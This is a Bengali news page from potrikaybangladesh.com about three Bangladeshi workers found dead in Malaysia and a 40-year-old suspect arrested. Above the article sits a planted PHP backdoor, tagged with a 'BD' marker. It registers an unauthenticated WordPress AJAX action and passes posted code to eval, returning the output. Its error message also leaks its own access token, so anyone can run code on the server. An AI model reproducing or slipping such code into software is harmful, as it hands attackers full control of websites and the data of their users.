// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মালয়েশিয়ায় ৩ বাংলাদেশির মরদেহ উদ্ধার, গ্রেপ্তার ১ | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeঅপরাধমালয়েশিয়ায় ৩ বাংলাদেশির মরদেহ উদ্ধার, গ্রেপ্তার ১

মালয়েশিয়ায় ৩ বাংলাদেশির মরদেহ উদ্ধার, গ্রেপ্তার ১

মালয়েশিয়ার তামান লিঙ্গির সুয়া ম্যাঙ্গিস এস্টেট এলাকা থেকে তিন বাংলাদেশির মরদেহ উদ্ধার করেছে পুলিশ। গুরুতর আহত অপর এক বাংলাদেশিকে হাসপাতালে ভর্তি করা হয়েছে।

নেগেরি সেম্বিলান পুলিশের প্রধান দাতুক আলজাফনি আহমাদের বরাতে আজ মঙ্গলবার দেশটির সংবাদমাধ্যম দ্য নিউ স্ট্রেইটস টাইমস এ নিয়ে প্রতিবেদন প্রকাশ করেছে।

গতকাল সোমবার বিকেল সোয়া ৪টার মরদেহ উদ্ধার করে পুলিশ।

আলজাফনি আহমাদ জানান, গতকাল বিকেলে তামান লিঙ্গির একটি বাড়িতে কয়েকজন বাংলাদেশি নাগরিকের মধ্যে মারামারির খবর পেয়ে ঘটনাস্থলে যায় পুলিশ। এ সময় সুয়া ম্যাঙ্গিস এস্টেট এলাকা থেকে তিনজনের মরদেহ উদ্ধার করেন তারা।

তিনজনের শরীরের বিভিন্ন স্থানে গুরুতর আঘাতের চিহ্ন রয়েছে বলে জানান তিনি। 

আহত আরেক বাংলাদেশিকে রেমবাউ হাসপাতালে চিকিৎসা দেওয়া হচ্ছে।

ঘটনার সঙ্গে জড়িত সন্দেহে ৪০ বছর বয়সী এক বাংলাদেশিকে গ্রেপ্তার করেছে পুলিশ।

হতাহতদের নাম-পরিচয় এখনো জানা যায়নি।‍

নেগেরি সেম্বিলান পুলিশের প্রধান বলেন, ‘প্রাথমিক তদন্তে ঘটনায় জড়িত সবাই একই প্রতিষ্ঠানে কাজ করতেন বলে জানা গেছে। তারা একই বাড়িতেও বসবাস করতেন।

একাধিক স্থানে এই হতাহতের ঘটনা ঘটেছে বলে জানিয়েছেন তিনি। বলেন, ‘কীভাবে ও কী কারণে এ ঘটনা ঘটেছে, তা জানতে তদন্ত চলছে।’

পুলিশ আরও জানিয়েছে, গ্রেপ্তার বাংলাদেশির বিরুদ্ধে আগে কোনো অপরাধমূলক রেকর্ড পাওয়া যায়নি।

এ ঘটনায় মালয়েশিয়ার দণ্ডবিধির ৩০২ ধারায় হত্যা মামলা দায়ের করা হয়েছে। 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments